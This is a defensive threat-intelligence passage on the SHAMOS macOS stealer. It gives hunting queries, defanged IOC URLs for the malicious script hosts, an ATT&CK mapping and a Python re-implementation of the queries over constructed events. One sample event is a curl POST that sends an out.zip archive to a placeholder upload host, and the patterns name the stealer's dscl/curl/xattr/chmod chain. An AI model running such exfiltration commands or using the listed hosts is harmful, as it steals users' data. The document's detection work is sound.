Assessment

This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors. Promoting malicious lookalike websites increases site traffic, which leads to more potential victims. The one-line installation command lets eCrime actors install the Mach-O executable directly onto the victim’s machine while bypassing Gatekeeper checks.

CrowdStrike Counter Adversary Operations assesses that eCrime actors will likely continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers. This assessment is made with high confidence, as the combination has historically been successful, and these methods allow actors to bypass Gatekeeper checks.

Recommended Prevention Settings

To protect endpoints from this threat, CrowdStrike Falcon® Insight XDR customers should ensure the following prevention policy settings are configured:

  • Suspicious process prevention
  • Intelligence-sourced threat prevention

Threat Hunting Queries

The following CrowdStrike Falcon® Next-Gen SIEM Advanced Event Search queries are provided to assist defenders in hunting for this and similar activity across their endpoints.

1. A process executing from a /tmp path that spawns osascript with an inline (-e) script:

event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*/tmp/*"
| join({event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*osascript" CommandLine="*-e*" | rename(field="CommandLine", as="ChildCommandLine") | rename(field="ImageFileName", as="ChildImageFileName")}, field=TargetProcessId, key=ParentProcessId, include=["ChildImageFileName", "ChildCommandLine"], limit=20000)
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine, ChildImageFileName, ChildCommandLine])

2. “Bash script execution with calls to risky LOLBins” (script content naming dscl, curl, xattr and chmod in sequence):

event_platform=Mac #event_simpleName=ScriptControlScanInfo ScriptContent="*dscl*curl*xattr*chmod*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ScriptContent])

3. curl issuing a POST that references an out.zip archive:

event_platform=Mac #event_simpleName=ProcessRollup2 FileName=curl CommandLine="*POST*out.zip*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine])

NOTE: Make sure to update the Falcon URL to the cloud in which your environment is currently configured (US1, US2, EU, etc.).

Indicators of Compromise (IOCs)

IOC                                                 Description
rescue-mac[.]com                                    Malvertising websites containing instructions to download SHAMOS
https[:]//github[.]com/jeryrymoore/Iterm2 [1]       Malvertising websites containing instructions to download SHAMOS
https[:]//macostutorial[.]com/iterm2/install[.]sh   Bash script host URLs
https[:]//icloudservers[.]com/gm/install[.]sh       Bash script host URLs
https[:]//macostutorial[.]com/iterm2/update         SHAMOS host URLs
https[:]//icloudservers[.]com/gm/update             SHAMOS host URLs

[1] The legitimate iTerm2 GitHub repository is located at https[:]//github[.]com/gnachman/iTerm2.

MITRE ATT&CK Framework

The following table maps reported COOKIE SPIDER and SHAMOS tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework.

ID         Technique                                                  Description
T1583.001  Acquire Infrastructure: Domains                            The eCrime actor registered fake macOS help websites
T1189      Drive-by Compromise                                        Malvertising distributes websites containing SHAMOS installation instructions
T1204      User Execution                                             SHAMOS requires the user to execute the malicious installer command
T1027.010  Obfuscated Files or Information: Command Obfuscation       The malicious command uses Base64 encoding to obfuscate the Bash script download URL
T1105      Ingress Tool Transfer                                      The malicious Bash script downloads SHAMOS from an external URL
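The three hunting queries in the Threat Hunting Queries section, re-expressed in Python over constructed sample events so the matching logic can be checked offline. This is an added illustration, not CrowdStrike's code; the field names follow the queries, while every event value (paths, PIDs, command lines) is invented.

```python
import fnmatch

# Constructed sample events shaped like the Falcon fields the three hunting
# queries reference (ProcessRollup2 / ScriptControlScanInfo). Not real telemetry.
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "TargetProcessId": 100, "ParentProcessId": 1,
     "ImageFileName": "/private/tmp/update", "CommandLine": "/private/tmp/update"},
    {"event_simpleName": "ProcessRollup2", "TargetProcessId": 101, "ParentProcessId": 100,
     "ImageFileName": "/usr/bin/osascript", "CommandLine": "osascript -e <applescript>"},
    {"event_simpleName": "ProcessRollup2", "TargetProcessId": 200, "ParentProcessId": 1,
     "ImageFileName": "/Applications/Script Editor.app/Contents/MacOS/Script Editor",
     "CommandLine": "Script Editor"},
    {"event_simpleName": "ProcessRollup2", "TargetProcessId": 201, "ParentProcessId": 200,
     "ImageFileName": "/usr/bin/osascript", "CommandLine": "osascript -e beep"},  # benign parent
    {"event_simpleName": "ScriptControlScanInfo", "TargetProcessId": 300,
     "ScriptContent": "dscl ...; curl ... -o /tmp/update; xattr ... /tmp/update; chmod +x /tmp/update"},
    {"event_simpleName": "ScriptControlScanInfo", "TargetProcessId": 301,
     "ScriptContent": "curl ... -O; chmod +x ./installer"},  # no dscl/xattr: should not match
    {"event_simpleName": "ProcessRollup2", "TargetProcessId": 400, "ParentProcessId": 100,
     "FileName": "curl", "ImageFileName": "/usr/bin/curl",
     "CommandLine": "curl -X POST -F data=@/tmp/out.zip <upload-url-placeholder>"},
]

def glob(value, pattern):
    """Falcon-style '*' wildcard compare; treated as case-sensitive here (an assumption)."""
    return fnmatch.fnmatchcase(value or "", pattern)

def hunt_tmp_parent_osascript(events):
    """Query 1: a process running from a /tmp path whose child is osascript -e."""
    procs = [e for e in events if e["event_simpleName"] == "ProcessRollup2"]
    by_pid = {e["TargetProcessId"]: e for e in procs}
    hits = []
    for child in procs:  # same join as the query: child.ParentProcessId -> parent.TargetProcessId
        parent = by_pid.get(child.get("ParentProcessId"))
        if (parent and glob(parent["ImageFileName"], "*/tmp/*")
                and glob(child["ImageFileName"], "*osascript") and glob(child["CommandLine"], "*-e*")):
            hits.append((parent["TargetProcessId"], child["TargetProcessId"]))
    return hits

def hunt_risky_lolbin_script(events):
    """Query 2: scanned script content naming dscl, curl, xattr and chmod in that order."""
    return [e["TargetProcessId"] for e in events if e["event_simpleName"] == "ScriptControlScanInfo"
            and glob(e["ScriptContent"], "*dscl*curl*xattr*chmod*")]

def hunt_curl_post_outzip(events):
    """Query 3: curl command line containing POST followed by out.zip."""
    return [e["TargetProcessId"] for e in events if e["event_simpleName"] == "ProcessRollup2"
            and e.get("FileName") == "curl" and glob(e["CommandLine"], "*POST*out.zip*")]
```

Running the three functions over SAMPLE_EVENTS flags only the /tmp parent with its osascript child, the script mentioning all four binaries, and the curl POST; the Script Editor-spawned osascript and the script without dscl/xattr are correctly left out.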